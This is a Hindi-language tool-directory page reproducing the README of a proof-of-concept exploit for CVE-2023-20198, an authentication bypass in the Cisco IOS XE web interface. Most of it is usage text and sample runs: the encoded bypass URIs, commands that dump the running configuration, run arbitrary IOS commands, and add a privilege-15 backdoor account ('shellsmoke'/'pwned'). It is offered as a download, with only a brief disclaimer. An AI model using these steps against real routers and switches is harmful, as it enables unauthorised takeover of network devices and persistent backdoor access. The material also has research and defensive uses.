Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20198 — CVE-2023-20198 शोषण PoC | Kitploit
उपकरण/GitHubGitHub/smokeintheshell/cve-2023-20198
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरण
GitHubsmokeintheshell/cve-2023-20198

CVE-2023-20198

CVE-2023-20198 शोषण PoC

रिपॉजिटरी देखें
661946 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-20198

CVE-2023-20198 के लिए शोषण PoC

विवरण

CVE-2023-20198 की विशेषता अनुचित पथ सत्यापन है जो Nginx फ़िल्टरिंग को बायपास करके प्रमाणीकरण की आवश्यकता के बिना webui_wsma_http वेब एंडपॉइंट तक पहुँचने की अनुमति देता है।
एंडपॉइंट तक प्रमाणीकरण को बायपास करके, एक हमलावर विशेषाधिकार 15 विशेषाधिकारों के साथ मनमाने Cisco IOS कमांड को निष्पादित कर सकता है या कॉन्फ़िगरेशन परिवर्तन जारी कर सकता है।
Cisco की पहले से अज्ञात भेद्यता के सक्रिय शोषण की जाँच से पता चला कि खतरे के अभिनेताओं ने पहले CVE-2023-20198 का शोषण किया ताकि विशेषाधिकार स्तर 15 वाला एक नया उपयोगकर्ता जोड़ा जा सके। आगे के हमलों में CVE-2023-20273 का शोषण शामिल था ताकि अंतर्निहित लिनक्स OS root उपयोगकर्ता तक पहुँच बढ़ाई जा सके ताकि प्रत्यारोपण की सुविधा मिल सके।

यह PoC CVE-2023-20198 का शोषण करके दो अलग-अलग XML SOAP एंडपॉइंट का लाभ उठाता है:
भेद्यता जाँच, कॉन्फ़िग और कमांड निष्पादन विकल्प सभी कमांड को execCLI एलिमेंट टैग में डालने के लिए cisco:wsma-exec SOAP एंडपॉइंट को लक्षित करते हैं।
उपयोगकर्ता जोड़ने का विकल्प कॉन्फ़िगरेशन परिवर्तन जारी करने और विशेषाधिकार 15 खाता जोड़ने के लिए cisco:wsma-config SOAP एंडपॉइंट को लक्षित करता है। इस एंडपॉइंट का [दुरुपयोग] करके अन्य कॉन्फ़िगरेशन परिवर्तन किए जा सकते हैं, लेकिन यह इस PoC के दायरे से बाहर है।

cisco:wsma-exec SOAP एंडपॉइंट का दुरुपयोग nuclei टेम्पलेट से आया
cisco:wsma-config SOAP एंडपॉइंट का दुरुपयोग horizon3ai PoC से आया

नोट: मैंने इस CVE के लिए कोई मूल शोध या PoC विकास नहीं किया। क्रेडिट के लिए संदर्भ अनुभाग देखें।

उपयोग

usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help          show this help message and exit
  -t targetIP         Target IP Address
  -l targetFile       File containing IP Addresses (-c only)
  -https              Use https
  -uri vulnerableURI  The URI that is vulnerable to exploit. The most common are "%2577eb%2575i_%2577sma_Http", "%2577eb%2575i_%2577sma_https", and "%2577ebui_wsma_https". You may need to play around with these along with -https to get a true positive result
  -c                  [X] Check for vulnerability
  -g                  [X] Get Cisco IOS running config
  -e command          [X] Execute Cisco IOS command
  -a                  [X] Add new priv 15 user
  -d                  [X] Remove priv 15 user
  -u newUserName      [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass      [Optional] new user pass for -a. Default: pwned
  -o outputFile       Write output to file
  -v                  Increase verbosity

भेद्यता जाँच

CVE-2023-20198 की जाँच करने के लिए, -c भेद्यता का शोषण करके uname -a निष्पादित करने का प्रयास करेगा
उदाहरण:

# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

Cisco कॉन्फ़िग प्राप्त करें

-g विकल्प चल रहे कॉन्फ़िगरेशन को खींचने के लिए sh run निष्पादित करता है
उदाहरण:

# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...

कमांड निष्पादित करें

-e विकल्प के साथ मनमाने Cisco IOS कमांड निष्पादित किए जा सकते हैं।
कॉन्फ़िगरेशन परिवर्तन करने के लिए इसका उपयोग करते समय अत्यधिक सावधानी बरती जानी चाहिए। कोई इनपुट सत्यापन नहीं है और परिवर्तन तुरंत चल रहे कॉन्फ़िगरेशन पर लागू होते हैं।
उदाहरण:

# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...

उपयोगकर्ता जोड़ें

-a विकल्प का उपयोग एक नया विशेषाधिकार 15 उपयोगकर्ता खाता बनाने के लिए किया जा सकता है, वैकल्पिक रूप से क्रमशः -u और -p के साथ खाता नाम और पासवर्ड निर्दिष्ट करें।
उदाहरण:

# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.

उपयोगकर्ता हटाएँ

-d विकल्प का उपयोग डिवाइस से उपयोगकर्ता खाता हटाने के लिए किया जा सकता है, और -u के साथ निर्दिष्ट उपयोगकर्ता नाम का सम्मान करता है।
यह सुनिश्चित करने के लिए सावधानी बरती जानी चाहिए कि आप कोई वैध खाता नहीं हटा रहे हैं।
यह उन उदाहरणों के लिए जोड़ा गया था जहाँ शोषित Cisco तक शेल/वेबयूआई पहुँच प्राप्त नहीं की जा सकती है। यह देखा गया कि विशेषाधिकार 15 उपयोगकर्ता जोड़ने से वेबयूआई पहुँच नहीं मिलती है और यह होस्ट पर शोषण कलाकृतियों को छोड़ सकता है।

संदर्भ

Cisco सलाहकार
horizon3ai CVE-2023-20198 अनुसंधान
horizon3ai CVE-2023-20198 PoC
nuclei CVE-2023-20198 टेम्पलेट (लेखक: iamnoooob, rootxharsh, pdresearch)
LeakIX CVE-2023-20273 PoC

TODO

  • https समर्थन
  • CVE-2023-20273 कार्यान्वयन
  • टाइमआउट और त्रुटि प्रबंधन

अस्वीकरण

इस परियोजना में निहित कोड केवल अनुसंधान और उन प्रणालियों पर उपयोग के लिए है जहाँ उपयोगकर्ता के पास स्पष्ट प्राधिकरण है।
इस परियोजना का लेखक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं है।
जिम्मेदारी से उपयोग करें और बुरे न बनें।

टूल डाउनलोड करें